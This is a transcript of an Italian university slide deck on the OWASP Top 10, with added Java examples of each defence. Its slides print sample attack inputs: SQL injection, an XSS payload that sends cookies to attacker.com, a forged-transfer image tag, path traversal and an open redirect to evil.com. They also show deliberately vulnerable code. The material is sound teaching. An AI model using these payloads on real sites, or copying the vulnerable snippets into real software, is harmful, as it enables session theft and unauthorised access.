OWASP Top 10 Application Security Risks

Creative Commons Attribution-NonCommercial-ShareAlike License

Transcript of "OWASP Top 10 Application Security Risks"
  1. OWASP Top 10 Application Security Risks, by Francesco Iovine. Università degli Studi di Roma "Tor Vergata", Faculty of Engineering, Computer and Internet Security course, 1 June 2012. http://www.flickr.com/photos/purpleslog/2880224058/
  2. OWASP Top 10 Application Security Risks
     A1 | Injection
     A2 | Cross-Site Scripting
     A3 | Broken Authentication and Session Management
     A4 | Insecure Direct Object References
     A5 | Cross-Site Request Forgery (CSRF)
     A6 | Security Misconfiguration
     A7 | Insecure Cryptographic Storage
     A8 | Failure to Restrict URL Access
     A9 | Insufficient Transport Layer Protection
     A10 | Unvalidated Redirects and Forwards
  3. +R | Risk Factors
  4. http://www.flickr.com/photos/doug88888/4561376850/
  5. A1 | Injection
     Java
       // vulnerable: the request parameter is concatenated straight into the SQL text
       String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'";
     http://example.com/app/accountView?id=' or '1'='1
  6. A1 | Injection
     Java
       // fixed: the value travels as a bound parameter, never as part of the SQL text
       String selectStatement = "SELECT * FROM User WHERE userId = ? ";
       PreparedStatement prepStmt = con.prepareStatement(selectStatement);
       prepStmt.setString(1, userId);
       ResultSet rs = prepStmt.executeQuery();
  7. http://www.flickr.com/photos/dlombardia/7198892852/
  8. A2 | Cross-Site Scripting
     Java
       // vulnerable: the CC parameter is written into the attribute without encoding
       String page = "";
       page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";
     Value submitted for CC:
       '><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'
     JSP
       <% String name = resultSet.getString("name"); %>
       Employee Name = <%= name %>
     LINK
       http://example.com/page.htm?p=<script>attack(document.cookie)</script>
  9. A2 | Cross-Site Scripting
     JSP
       <div>
         il nome &egrave; <c:out value="${param.firstName}"/>
       </div>
     HTTP header / HTML meta element
       Content-Security-Policy: default-src 'self'; img-src *; object-src media1.example.com *.cdn.example.com; script-src trustedscripts.example.com
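Slides 8 and 9 show the XSS defence only as a JSTL tag; the following is an added example (not code from the slides or their author) of the same output encoding written by hand, applied to the "creditcard" field of slide 8. The class name, the `creditCardField` helper and the sample values are assumptions made for the example.

```java
import java.util.Arrays;
import java.util.List;

// Added example: HTML output encoding as the fix for the slide 8 field.
// Every character that can end an attribute value or open a tag is replaced
// by its character reference, so a request parameter becomes inert text.
public class HtmlEncodingExample {

    /** Encode a string for HTML text content or a quoted attribute value. */
    public static String encodeForHtml(String input) {
        if (input == null) {
            return "";
        }
        StringBuilder out = new StringBuilder(input.length() + 16);
        for (int i = 0; i < input.length(); i++) {
            char c = input.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#x27;"); break;
                case '/':  out.append("&#x2F;"); break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    /** The slide's input field, rebuilt with the parameter encoded and the attribute quoted. */
    public static String creditCardField(String ccParam) {
        return "<input name='creditcard' type='TEXT' value='" + encodeForHtml(ccParam) + "'>";
    }

    public static void main(String[] args) {
        // Constructed sample values standing in for request.getParameter("CC"):
        // a normal card number and the payload from slide 8.
        List<String> samples = Arrays.asList(
            "4111111111111111",
            "'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>");
        for (String cc : samples) {
            String html = creditCardField(cc);
            // A correctly encoded attribute contains no raw "<script" and closes its quote only at the end.
            boolean safe = !html.contains("<script") && html.indexOf("'>") == html.length() - 2;
            System.out.println((safe ? "OK   " : "FAIL ") + html);
        }
    }
}
```

Encoding is context-specific: this table is right for HTML text and quoted attributes, but a value placed inside a JavaScript string, a URL or a CSS property needs the encoding of that context instead, which is why the slide's CSP header is listed as a second, independent layer.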
  10. http://www.flickr.com/photos/ogimogi/2980070571
  11. A3 | Broken Authentication and Session Management
      http://example.com/sale/saleitems;jsessionid=2P0OC2JDPXM0OQSNDLPSKHCJUN2JV?dest=Hawaii
  12. A3 | Broken Authentication and Session Management
      Java
        public void logout() {
            HttpSession session = request.getSession(false);
            if (session != null) {
                session.invalidate();   // destroy the server-side state, not just a client flag
            }
            loggedIn = false;
        }
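Slide 11 shows a session id exposed in the URL and slide 12 shows only the logout half of session handling. The following added example (not code from the slides or their author) fills in the rest: an unguessable id, an idle timeout, and a fresh id issued at login so that an id planted before authentication cannot be reused. `HttpSession` is replaced by a `Map` so the code runs without a servlet container; the class name, the 15-minute timeout and the user name are assumptions for the example.

```java
import java.security.SecureRandom;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

// Added example: a minimal server-side session store showing random ids,
// idle expiry, id rotation at login (anti session fixation) and full logout.
public class SessionStoreExample {
    private static final SecureRandom RNG = new SecureRandom();
    private static final long IDLE_TIMEOUT_MS = 15 * 60 * 1000L;   // assumed policy

    /** One server-side session: who is logged in (null before login) and last activity time. */
    static final class Session {
        String user;
        long lastAccess;
    }

    private final Map<String, Session> sessions = new HashMap<>();

    /** 128 random bits, URL-safe base64 without padding; never a counter or a timestamp. */
    static String newSessionId() {
        byte[] id = new byte[16];
        RNG.nextBytes(id);
        return Base64.getUrlEncoder().withoutPadding().encodeToString(id);
    }

    /** Anonymous session, as created on a first request. */
    public String create() {
        String id = newSessionId();
        Session s = new Session();
        s.lastAccess = System.currentTimeMillis();
        sessions.put(id, s);
        return id;
    }

    /** Look up a session by id; an expired session is removed and treated as absent. */
    public Session get(String id) {
        Session s = sessions.get(id);
        if (s == null) {
            return null;
        }
        long now = System.currentTimeMillis();
        if (now - s.lastAccess > IDLE_TIMEOUT_MS) {
            sessions.remove(id);
            return null;
        }
        s.lastAccess = now;
        return s;
    }

    /** Login: discard the pre-authentication id and issue a new one bound to the user. */
    public String login(String oldId, String user) {
        sessions.remove(oldId);
        String id = create();
        sessions.get(id).user = user;
        return id;
    }

    /** Logout, as on slide 12: the server-side state is destroyed. */
    public void logout(String id) {
        sessions.remove(id);
    }

    public static void main(String[] args) {
        SessionStoreExample store = new SessionStoreExample();
        String fixedId = store.create();             // an id that existed before authentication
        String authId = store.login(fixedId, "alice");
        System.out.println("pre-login id still valid after login? " + (store.get(fixedId) != null));
        System.out.println("new id belongs to " + store.get(authId).user);
        store.logout(authId);
        System.out.println("id valid after logout? " + (store.get(authId) != null));
    }
}
```

In a real servlet the same rotation is `session.invalidate()` followed by `request.getSession(true)` (or `request.changeSessionId()` on Servlet 3.1), and the id should be carried only in a cookie so that it never lands in URLs, logs or the Referer header as on slide 11.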
  13. http://www.flickr.com/photos/lovestruck94/4462625337
  14. A4 | Insecure Direct Object References
      Java
        // parameterised, but any account id the user names is accepted: no ownership check
        String query = "SELECT * FROM accts WHERE account = ?";
        PreparedStatement pstmt = connection.prepareStatement(query, ...);
        pstmt.setString(1, request.getParameter("acct"));
        ResultSet results = pstmt.executeQuery();
      http://example.com/app/accountInfo?acct=notmyacct
  15. A4 | Insecure Direct Object References
      JEE Spring Frameworks, dispatcher.xml
        <bean id="userRoleAuthorizationInterceptor" class="com.example.UserRoleAuthorizationInterceptor" />
  16. http://www.flickr.com/photos/brettdavis/3943432908
  17. A5 | Cross-Site Request Forgery (CSRF)
      http://example.com/app/transferFunds?amount=1500&destAccount=4673243243
      HTML on attacker-website.com
        <img src="http://example.com/app/transferFunds?amount=1500&destAccount=attackersAcct#" width="0" height="0" />
  18. A5 | Cross-Site Request Forgery (CSRF)
      Java
        private String createToken() {
            String token = java.util.UUID.randomUUID().toString();
            session.setAttribute("token", token);
            return token;
        }
      HTML
        <input type="hidden" name="token" value="${sessionObject.token}"/>
      Java
        public void doPost(...) {
            Object expected = request.getSession().getAttribute("token");
            String submitted = request.getParameter("token");
            // null-safe: a request without a token must be rejected, not raise NullPointerException
            if (expected == null || !expected.equals(submitted)) {
                throw new SecurityException("invalid CSRF token");
            }
            ...
        }
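The synchronizer-token pattern of slide 18, written out completely as an added example (not code from the slides or their author). The session is modelled as a `Map` so it runs without a servlet container; in a servlet the same calls go to `HttpSession.setAttribute`/`getAttribute` and `request.getParameter`. The class name, the attribute name `csrf_token` and the two constructed requests are assumptions for the example.

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

// Added example: CSRF token generation, embedding and constant-time verification.
public class CsrfTokenExample {
    private static final SecureRandom RNG = new SecureRandom();
    static final String TOKEN_ATTR = "csrf_token";   // assumed attribute name

    /** Store a fresh 256-bit random token in the session and return it for embedding in forms. */
    public static String createToken(Map<String, Object> session) {
        byte[] raw = new byte[32];
        RNG.nextBytes(raw);
        String token = Base64.getUrlEncoder().withoutPadding().encodeToString(raw);
        session.put(TOKEN_ATTR, token);
        return token;
    }

    /** Hidden form field; the token is the one value a third-party site cannot read or guess. */
    public static String hiddenField(String token) {
        return "<input type=\"hidden\" name=\"token\" value=\"" + token + "\"/>";
    }

    /**
     * Verify the token submitted with a state-changing request. Null-safe (a request
     * with no token fails instead of throwing) and compared in constant time.
     */
    public static boolean isValidToken(Map<String, Object> session, String submitted) {
        Object expected = session.get(TOKEN_ATTR);
        if (!(expected instanceof String) || submitted == null) {
            return false;
        }
        byte[] a = ((String) expected).getBytes(StandardCharsets.UTF_8);
        byte[] b = submitted.getBytes(StandardCharsets.UTF_8);
        return MessageDigest.isEqual(a, b);
    }

    /** The doPost guard of slide 18: reject before touching any state. */
    public static void transferFunds(Map<String, Object> session, Map<String, String> params) {
        if (!isValidToken(session, params.get("token"))) {
            throw new SecurityException("missing or invalid CSRF token");
        }
        System.out.println("transfer of " + params.get("amount") + " to " + params.get("destAccount") + " accepted");
    }

    public static void main(String[] args) {
        Map<String, Object> session = new HashMap<>();
        String token = createToken(session);
        System.out.println(hiddenField(token));

        // Constructed request 1: the legitimate form post, token included.
        Map<String, String> good = new HashMap<>();
        good.put("amount", "1500");
        good.put("destAccount", "4673243243");
        good.put("token", token);
        transferFunds(session, good);

        // Constructed request 2: the <img>-triggered request of slide 17, which carries
        // the victim's cookie automatically but cannot carry the token.
        Map<String, String> forged = new HashMap<>();
        forged.put("amount", "1500");
        forged.put("destAccount", "attackersAcct");
        try {
            transferFunds(session, forged);
        } catch (SecurityException e) {
            System.out.println("forged request rejected: " + e.getMessage());
        }
    }
}
```

The token must be checked on every state-changing request (POST, PUT, DELETE), and state changes should never be reachable by GET at all, since the `<img>` on slide 17 only works because the transfer accepts a GET.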
  19. http://www.flickr.com/photos/learnscope/2547026015
  20. A6 | Security Misconfiguration
      - Out-of-date development framework
      - Application server: default credentials
      - Web server: directory listing
      - Information disclosure in error messages
  21. A6 | Security Misconfiguration
      web.xml
        <security-constraint>
          <web-resource-collection>
            <web-resource-name>SecureOrders</web-resource-name>
            <description>...</description>
            <url-pattern>/orders/*</url-pattern>
          </web-resource-collection>
          <auth-constraint>
            <role-name>assistant</role-name>
            <role-name>manager</role-name>
          </auth-constraint>
          <user-data-constraint>
            <description>SSL required</description>
            <transport-guarantee>CONFIDENTIAL</transport-guarantee>
          </user-data-constraint>
        </security-constraint>
  22. http://www.flickr.com/photos/zebble/6786151
  23. A7 | Insecure Cryptographic Storage
      - Data backups stored together with the key
      - Password database hashed without salt
      - SQL injection from front-end applications
  24. A7 | Insecure Cryptographic Storage
      Java
        // note: a single unsalted SHA-256 pass, the weakness listed on slide 23
        private String passwordDigest(String input) throws Exception {
            byte[] text = input.getBytes();
            MessageDigest algorithm = MessageDigest.getInstance("SHA-256");
            algorithm.reset();
            algorithm.update(text);
            byte[] messageDigest = algorithm.digest();
            // hex encoding: OR with 0x100 forces three hex digits, substring(1, 3) keeps the low two
            StringBuffer hexString = new StringBuffer();
            for (int i = 0; i < messageDigest.length; i++) {
                hexString.append(Integer.toHexString((messageDigest[i] & 0xFF) | 0x100).toUpperCase().substring(1, 3));
            }
            return hexString.toString();
        }
  25. http://www.flickr.com/photos/brewbooks/2591952795
  26. A8 | Failure to Restrict URL Access
      http://www.example.com/app/getappInfo
      http://www.example.com/app/admin_getappInfo
  27. A8 | Failure to Restrict URL Access
      http://www.example.com/openfile.jsp?file=report.pdf
      http://www.example.com/openfile.jsp?file=../../../../pvt-dir/pvt-file
      Java
        // allow-list: name, a literal dot (escaped; an unescaped dot would also match "/"), extension
        if (!filename.matches("^[ a-z0-9-_]+\\.[a-z0-9]+$")) {
            throw new SecurityException("illegal filename");
        }
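The allow-list regex of slide 27 is one layer; a second, independent one is to resolve the requested name under the intended directory and reject anything whose real path ends up outside it, so that "../" sequences, absolute paths and symlinks out of the directory all fail the same check. The following is an added example (not code from the slides or their author); the class name, the slightly stricter regex and the temporary directory standing in for the real reports directory are assumptions for the example.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;

// Added example: allow-list plus canonical-path containment check for a file download.
public class OpenFileGuard {
    // Assumed allow-list: lowercase name, a literal dot, lowercase extension; no separators.
    private static final String SAFE_NAME = "^[a-z0-9_-]+\\.[a-z0-9]+$";

    /**
     * Return the real path of a report the client may open, or throw SecurityException.
     * Syntactic check (the regex) first, then semantic check (the resolved path,
     * with symlinks followed, must still lie inside baseDir).
     */
    public static Path resolveReport(Path baseDir, String requested) throws IOException {
        if (requested == null || !requested.matches(SAFE_NAME)) {
            throw new SecurityException("filename rejected by allow-list: " + requested);
        }
        Path base = baseDir.toRealPath();
        Path candidate = base.resolve(requested).normalize();
        if (!candidate.startsWith(base)) {
            throw new SecurityException("path escapes base directory");
        }
        if (!Files.isRegularFile(candidate)) {
            throw new SecurityException("not a regular file");
        }
        Path real = candidate.toRealPath();   // follows symlinks
        if (!real.startsWith(base)) {
            throw new SecurityException("symlink escapes base directory");
        }
        return real;
    }

    public static void main(String[] args) throws IOException {
        // Constructed sandbox so the example runs anywhere: a temp dir with one report in it.
        Path base = Files.createTempDirectory("reports");
        Files.write(base.resolve("report.pdf"), new byte[] {0x25, 0x50, 0x44, 0x46});

        String[] requests = {
            "report.pdf",                       // legitimate
            "../../../../pvt-dir/pvt-file",     // the traversal from slide 27
            "report/pdf",                       // separator that an unescaped dot would let through
            "missing.pdf"                       // passes the regex but does not exist
        };
        for (String r : requests) {
            try {
                System.out.println("allow " + r + " -> " + resolveReport(base, r));
            } catch (SecurityException e) {
                System.out.println("deny  " + r + " (" + e.getMessage() + ")");
            }
        }
    }
}
```

Neither check replaces authorization: the admin URL on slide 26 is a different failure, where a correctly named resource is served to a user who should not see it, and that is fixed by role checks such as the `<auth-constraint>` on slide 21, not by filename validation.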
  28. http://www.flickr.com/photos/clickclaker/6747794029
  29. A9 | Insufficient Transport Layer Protection
      - Authentication without SSL: session cookie capture
      - Misconfigured SSL certificate: phishing
      - Cleartext connection to the database
  30. A9 | Insufficient Transport Layer Protection
      web.xml
        <security-constraint>
          <web-resource-collection>
            <web-resource-name>Security page</web-resource-name>
            <url-pattern>/web/login/signup.jsp</url-pattern>
          </web-resource-collection>
          <user-data-constraint>
            <transport-guarantee>CONFIDENTIAL</transport-guarantee>
          </user-data-constraint>
        </security-constraint>
  31. http://www.flickr.com/photos/nafmo/2226652256/
  32. A10 | Unvalidated Redirects and Forwards
      - Redirect
        http://www.example.com/redirect.jsp?url=evil.com
      - Forward
        http://www.example.com/boring.jsp?fwd=admin.jsp
  33. A10 | Unvalidated Redirects and Forwards
      JEE Spring Frameworks, WizardFormController
        1. http://www.example.com/transfer.htm
        2. http://www.example.com/transfer.htm?_target1=
        3. http://www.example.com/transfer.htm?_target2=
        4. http://www.example.com/transfer.htm?_target3=
        5. http://www.example.com/transfer.htm?_finish=
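Slide 32 shows the `url` parameter of redirect.jsp being passed straight to the redirect. The following added example (not code from the slides or their author) validates that parameter before a redirect is issued: only in-application relative paths or absolute URLs whose host is on an explicit allow-list are accepted, and anything else falls back to a fixed page. The class name, the allow-list and the `/home` fallback are assumptions for the example.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Arrays;
import java.util.List;

// Added example: allow-list validation of a user-supplied redirect target.
public class RedirectGuard {
    private static final List<String> ALLOWED_HOSTS = Arrays.asList("www.example.com", "example.com"); // assumed
    private static final String FALLBACK = "/home";                                                     // assumed

    /** Returns the redirect target to use for the given user-supplied value. */
    public static String safeRedirectTarget(String url) {
        if (url == null || url.isEmpty()) {
            return FALLBACK;
        }
        // Protocol-relative ("//evil.com") and backslash forms are not in-application paths.
        if (url.startsWith("//") || url.contains("\\")) {
            return FALLBACK;
        }
        URI uri;
        try {
            uri = new URI(url);
        } catch (URISyntaxException e) {
            return FALLBACK;
        }
        if (uri.getScheme() == null && uri.getHost() == null && url.startsWith("/")) {
            return url;   // plain in-application path such as /account/summary
        }
        boolean httpScheme = "http".equalsIgnoreCase(uri.getScheme()) || "https".equalsIgnoreCase(uri.getScheme());
        if (httpScheme && uri.getHost() != null && ALLOWED_HOSTS.contains(uri.getHost().toLowerCase())) {
            return url;
        }
        return FALLBACK;
    }

    public static void main(String[] args) {
        // Constructed sample values for the "url" parameter.
        String[] samples = {
            "/account/summary",
            "https://www.example.com/sale/saleitems",
            "evil.com",                          // slide 32: bare host, no scheme
            "http://evil.com/",
            "//evil.com/phish",
            "javascript:alert(1)",
            "https://www.example.com.evil.com/"
        };
        for (String s : samples) {
            System.out.println(s + " -> " + safeRedirectTarget(s));
        }
    }
}
```

The safest design avoids the parameter altogether by redirecting to a server-side lookup key rather than a URL; where the URL must be accepted, the host comparison above is exact, so look-alike hosts such as the last sample are rejected. Forwards, as in boring.jsp on slide 32, need the same treatment, since a forward to admin.jsp bypasses the URL-level access checks of A8.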
  34. OWASP Top 10 Application Security Risks
      A1 | Injection
      A2 | Cross-Site Scripting
      A3 | Broken Authentication and Session Management
      A4 | Insecure Direct Object References
      A5 | Cross-Site Request Forgery (CSRF)
      A6 | Security Misconfiguration
      A7 | Insecure Cryptographic Storage
      A8 | Failure to Restrict URL Access
      A9 | Insufficient Transport Layer Protection
      A10 | Unvalidated Redirects and Forwards
  35. +R | Risk Factors
  36. +D | Advice for developers
      - Application Security Requirements (ASVS)
      - Application Security Architecture (Developers Guide)
      - Standard Security Controls (ESAPI)
      - Secure Development Lifecycle (SAMM)
      - Application Security Knowledge (OWASP Education Project)
  37. +V | Advice for testers
      - Be organized
      - Code review
      - Security and penetration testing
  38. +O | Advice for organizations
      - Start the application security program right away
      - Risk-based approach
      - Establish a strong foundation for application security
      - Integrate security into existing processes
      - Give management visibility
  39. References
      OWASP Top 10 Project: https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
      OWASP Development Guide: https://www.owasp.org/index.php/OWASP_Guide_Project
  40. Project 1, by Francesco Iovine. http://www.flickr.com/photos/purpleslog/2880224058/
  41. Web Application Security
      You are asked to provide a security assessment of a web application using the techniques presented.
      Which language/framework for the code?
      - Whichever the working group is most comfortable with
      What kind of assessment?
      - focus on testing
      - focus on risk
      - focus on development following the OWASP guidelines
  42. Web Application Security
      Which application?
      - OWASP Broken Web Application Project: https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project
      - Vulnerable Web Applications for Learning: http://securitythoughts.wordpress.com/2010/03/22/vulnerable-web-applications-for-learning/
      - Your own web application, developed for other projects or written ad hoc.
      - If the chosen web application has a mobile front-end, provide a security assessment of the whole system following the OWASP Mobile Security Project guidelines.
  43. References
      OWASP Top 10 Project: https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
      OWASP Testing Guide: https://www.owasp.org/index.php/OWASP_Testing_Project
      OWASP Development Guide: https://www.owasp.org/index.php/OWASP_Guide_Project
      OWASP Mobile Security Project: https://www.owasp.org/index.php/OWASP_Mobile_Security_Project
  44. Credits: Simone Onofri, Marco Ramilli, Cinzia Querques